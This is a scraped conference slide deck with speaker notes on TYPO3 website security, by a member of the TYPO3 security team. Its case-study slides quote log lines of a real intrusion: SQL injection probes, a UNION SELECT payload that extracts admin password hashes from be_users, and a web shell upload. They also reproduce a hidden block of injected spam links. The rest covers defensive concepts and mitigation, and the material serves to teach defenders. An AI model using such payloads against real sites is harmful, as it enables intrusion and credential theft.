The document discusses a presentation about TYPO3 security risks and mitigation. It begins with an introduction of the presenter and an overview of topics to be covered, including what security is, general security concepts, common attack vectors, a case study of how a hacker exploited a vulnerability, and methods for mitigating risks.
TYPO Security - Risks and Mitigation of a TYPO3 Site Security Breach
1. TYPO3 Conference - San Francisco 2011 Inspiring
TYPO Security - Risks and Mitigation sha
2. T3CON11 San Francisco
TYPO Security - Risks and Mitigation
10.06.2011
Helmut Hummel <helmut.hummel@typo3.org>
3. Introduction
About me
Involved in TYPO3 project since 2005
Member of the TYPO3 Security Team since 2008
TYPO3 Security Team Leader since 2009
TYPO3 Core Team Member since 2011
Employed at naw.info in Hannover, Germany
Twitter: helhum
Blog: http://www.naw.info/blogs/typo3security/
Inspiring people to
TYPO Security - Risks and Mitigation share
4. TYPO Security - Risks and Mitigation
Agenda
What is Security?
General Security Concepts
Attack Vectors
Knowing the Enemy: A Case Story
Mitigation
TYPO3 Security Team
Inspiring people to
TYPO Security - Risks and Mitigation share
5. What is Security?
Inspiring people to
TYPO Security - Risks and Mitigation share
6. Is TYPO3 secure?
Is my TYPO3 Site secure?
Inspiring people to
TYPO Security - Risks and Mitigation share
8. What is Security?
Criteria for Security
Privacy
Inspiring people to
TYPO Security - Risks and Mitigation share
9. What is Security?
Criteria for Security
Privacy
Integrity and Property
Inspiring people to
TYPO Security - Risks and Mitigation share
10. What is Security?
Criteria for Security
Privacy
Integrity and Property
Availability and Intentional Use
Inspiring people to
TYPO Security - Risks and Mitigation share
11. Security is a process, not
a product.
(Bruce Schneier)
Inspiring people to
TYPO Security - Risks and Mitigation share
13. What is Security?
Security is a process
Care taking and improvements over time
Inspiring people to
TYPO Security - Risks and Mitigation share
14. What is Security?
Security is a process
Care taking and improvements over time
Depending on your needs
Inspiring people to
TYPO Security - Risks and Mitigation share
15. What is Security?
Security is a process
Care taking and improvements over time
Depending on your needs
Nothing is secure! Something can only be not
insecure
at a particular time
Inspiring people to
TYPO Security - Risks and Mitigation share
16. What is Security?
Why TYPO3 can be considered to be not
insecure
Inspiring people to
TYPO Security - Risks and Mitigation share
17. What is Security?
Why TYPO3 can be considered to be not
insecure
TYPO3 Security Team takes care
Inspiring people to
TYPO Security - Risks and Mitigation share
18. What is Security?
Why TYPO3 can be considered to be not
insecure
TYPO3 Security Team takes care
Highly customizable for your needs
Inspiring people to
TYPO Security - Risks and Mitigation share
19. What is Security?
Why TYPO3 can be considered to be not
insecure
TYPO3 Security Team takes care
Highly customizable for your needs
Few critical Security issues over time
Inspiring people to
TYPO Security - Risks and Mitigation share
23. General Security Concepts
General Security Concepts
Defense in depth
Minimize Exposure / Least privilege
Inspiring people to
TYPO Security - Risks and Mitigation share
24. General Security Concepts
General Security Concepts
Defense in depth
Minimize Exposure / Least privilege
Inspiring people to
TYPO Security - Risks and Mitigation share
25. General Security Concepts
General Security Concepts
Defense in depth
Minimize Exposure / Least privilege
Do not rely on security by obscurity
Inspiring people to
TYPO Security - Risks and Mitigation share
26. General Security Concepts
General Security Concepts
Defense in depth
Minimize Exposure / Least privilege
Do not rely on security by obscurity
Log Activities
Inspiring people to
TYPO Security - Risks and Mitigation share
27. Attack Vectors
Inspiring people to
TYPO Security - Risks and Mitigation share
29. Attack Vectors
Attack Vectors
Security Issues in outdated TYPO3 Versions
Inspiring people to
TYPO Security - Risks and Mitigation share
30. Attack Vectors
Attack Vectors
Security Issues in outdated TYPO3 Versions
Security Issues in (outdated) TYPO3 Extensions
Inspiring people to
TYPO Security - Risks and Mitigation share
31. Attack Vectors
Attack Vectors
Security Issues in outdated TYPO3 Versions
Security Issues in (outdated) TYPO3 Extensions
Security Issues in TypoScript
Inspiring people to
TYPO Security - Risks and Mitigation share
32. Attack Vectors
Attack Vectors
Security Issues in outdated TYPO3 Versions
Security Issues in (outdated) TYPO3 Extensions
Security Issues in TypoScript
Simple paswords
Inspiring people to
TYPO Security - Risks and Mitigation share
33. Attack Vectors
Attack Vectors
Security Issues in outdated TYPO3 Versions
Security Issues in (outdated) TYPO3 Extensions
Security Issues in TypoScript
Simple paswords
Compromised PC with FTP access
Inspiring people to
TYPO Security - Risks and Mitigation share
34. Attack Vectors
Attack Vectors
Security Issues in outdated TYPO3 Versions
Security Issues in (outdated) TYPO3 Extensions
Security Issues in TypoScript
Simple paswords
Compromised PC with FTP access
Other Software on the webserver
Inspiring people to
TYPO Security - Risks and Mitigation share
35. Knowing the Enemy
Inspiring people to
TYPO Security - Risks and Mitigation share
36. Knowing the Enemy
The incident, how did it happen?
<div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos-
crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for-
palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/
ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph-
infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/
customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http://
yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</
a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a
href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165
Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for
3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt-
crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo-
v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/
restoreit-deluxe-edition-v301-crack.html">RestoreIT! Deluxe Edition v3.01 Crack</a> <a href="http://
tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a
href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06
build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS
SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff-
crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser-
bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb-
password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http://
reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a
href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006
Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker
1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062-
crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by-
tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2-
pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/
primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http://
fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a
href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET
v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks
Matlab R2006b (3 cds) Crack</a> <a
Inspiring people to
TYPO Security - Risks and Mitigation share
37. Knowing the Enemy
Searching for vulnerabilities
178.122.0.0 - - [17/Dec/2010:14:01:43 +0100]
"GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200
54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
Inspiring people to
TYPO Security - Risks and Mitigation share
38. Knowing the Enemy
Searching for vulnerabilities
178.122.0.0 - - [17/Dec/2010:14:02:30 +0100]
"GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select
+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,
30,31,32,33+--+ HTTP/1.1" 200
54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
Inspiring people to
TYPO Security - Risks and Mitigation share
39. Knowing the Enemy
Searching for vulnerabilities
14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010
Inspiring people to
TYPO Security - Risks and Mitigation share
40. Knowing the Enemy
Searching for vulnerabilities
14:03:21: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010'
Inspiring people to
TYPO Security - Risks and Mitigation share
41. Knowing the Enemy
Searching for vulnerabilities
14:03:42: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010
Inspiring people to
TYPO Security - Risks and Mitigation share
42. Knowing the Enemy
Searching for vulnerabilities
14:04:15: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 --
Inspiring people to
TYPO Security - Risks and Mitigation share
43. Knowing the Enemy
Found something!
14:04:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010
order by 10 --
Inspiring people to
TYPO Security - Risks and Mitigation share
44. Knowing the Enemy
Forging the exploit
14:08:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --
Inspiring people to
TYPO Security - Risks and Mitigation share
45. Knowing the Enemy
Exploit working!
14:09:04: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=-2010
union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,user
name,password,admin)),20,21,22 from be_users where admin=1 --
Now the hacker has the md5 hashes of
all admin passwords
Inspiring people to
TYPO Security - Risks and Mitigation share
46. Knowing the Enemy
15 minutes later: Log in as
admin!
14:21:48: /typo3/index.php
14:21:50: /typo3/backend.php
Inspiring people to
TYPO Security - Risks and Mitigation share
47. Knowing the Enemy
Uploading web shell
14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/
typo3conf/ext/realurlmanagement/
14:22:46: /typo3conf/ext/realurlmanagement/title.php
You loose!
Inspiring people to
TYPO Security - Risks and Mitigation share
49. Knowing the Enemy
Conclusion
Hackers know what they are doing
Inspiring people to
TYPO Security - Risks and Mitigation share
50. Knowing the Enemy
Conclusion
Hackers know what they are doing
They know TYPO3 very well
Inspiring people to
TYPO Security - Risks and Mitigation share
51. Knowing the Enemy
Conclusion
Hackers know what they are doing
They know TYPO3 very well
They also use automated tools
Inspiring people to
TYPO Security - Risks and Mitigation share
52. Knowing the Enemy
Conclusion
Hackers know what they are doing
They know TYPO3 very well
They also use automated tools
They often try to obfuscate the hack
Inspiring people to
TYPO Security - Risks and Mitigation share
53. Knowing the Enemy
Conclusion
Hackers know what they are doing
They know TYPO3 very well
They also use automated tools
They often try to obfuscate the hack
With automated attacks effort is low, gain is high
Inspiring people to
TYPO Security - Risks and Mitigation share
54. Mitigation
Inspiring people to
TYPO Security - Risks and Mitigation share
56. Mitiation
Mandatory steps
Monitor and Back Up your Website
Inspiring people to
TYPO Security - Risks and Mitigation share
57. Mitiation
Mandatory steps
Monitor and Back Up your Website
Read the announce Mailing list and bulletins
carefully
Inspiring people to
TYPO Security - Risks and Mitigation share
58. Mitiation
Mandatory steps
Monitor and Back Up your Website
Read the announce Mailing list and bulletins
carefully
Use up to date Software
Inspiring people to
TYPO Security - Risks and Mitigation share
59. Mitiation
Mandatory steps
Monitor and Back Up your Website
Read the announce Mailing list and bulletins
carefully
Use up to date Software
Use saltedpasswords and advise your admins (and
users) to use non obvious passwords
Inspiring people to
TYPO Security - Risks and Mitigation share
60. Mitiation
Mandatory steps
Monitor and Back Up your Website
Read the announce Mailing list and bulletins
carefully
Use up to date Software
Use saltedpasswords and advise your admins (and
users) to use non obvious passwords
Make your Integrators aware of possible
TypoScript problems
Inspiring people to
TYPO Security - Risks and Mitigation share
62. Mitiation
Advanced steps
Use TYPO3 Core features in favour of extensions
Inspiring people to
TYPO Security - Risks and Mitigation share
63. Mitiation
Advanced steps
Use TYPO3 Core features in favour of extensions
Use protected backend access
Inspiring people to
TYPO Security - Risks and Mitigation share
64. Mitiation
Advanced steps
Use TYPO3 Core features in favour of extensions
Use protected backend access
Consider using mod_security
Inspiring people to
TYPO Security - Risks and Mitigation share
65. Mitiation
Advanced steps
Use TYPO3 Core features in favour of extensions
Use protected backend access
Consider using mod_security
Consider using phpids TYPO3 Extension
Inspiring people to
TYPO Security - Risks and Mitigation share
66. TYPO3 Security Team
Inspiring people to
TYPO Security - Risks and Mitigation share
68. TYPO3 Security Team
Important things to know
Responsible Disclosure Policy
Inspiring people to
TYPO Security - Risks and Mitigation share
69. TYPO3 Security Team
Important things to know
Responsible Disclosure Policy
One communication channel (security@typo3.org)
Inspiring people to
TYPO Security - Risks and Mitigation share
70. TYPO3 Security Team
Important things to know
Responsible Disclosure Policy
One communication channel (security@typo3.org)
Pre-Announcements for critical issues only
Inspiring people to
TYPO Security - Risks and Mitigation share
71. TYPO3 Security Team
Important things to know
Responsible Disclosure Policy
One communication channel (security@typo3.org)
Pre-Announcements for critical issues only
You can support us
Inspiring people to
TYPO Security - Risks and Mitigation share
72. TYPO Security - Risks and Mitigation
Rescources
PHP-Sicherheit (Christopher Kunz and Stefan
Esser)
Essential PHP Security (Chris Shiflett)
http://www.owasp.org/
http://typo3.org/teams/security/security-
bulletins/
http://typo3.org/teams/security/resources/
http://buzz.typo3.org/teams/security/
Inspiring people to
TYPO Security - Risks and Mitigation share
73. Questions?
Inspiring people to
TYPO Security - Risks and Mitigation share
74. Thank You!
Inspiring people to
TYPO Security - Risks and Mitigation share
Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\nWhy it is important to define?\n\n\n
It depends ;)\n\n
Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &#x201E;subject&#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &#x201E;subject&#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &#x201E;subject&#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
\n
Caretaking: \n* Replace broken, not working locks, don&#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n->If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
Caretaking: \n* Replace broken, not working locks, don&#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n->If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
Caretaking: \n* Replace broken, not working locks, don&#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n->If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &#x201E;secret&#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &#x201E;secret&#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &#x201E;secret&#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &#x201E;secret&#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &#x201E;secret&#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &#x201E;small websites&#x201C; are targeted\n
Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &#x201E;small websites&#x201C; are targeted\n
Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &#x201E;small websites&#x201C; are targeted\n
Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &#x201E;small websites&#x201C; are targeted\n
Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &#x201E;small websites&#x201C; are targeted\n
Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
\n
Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n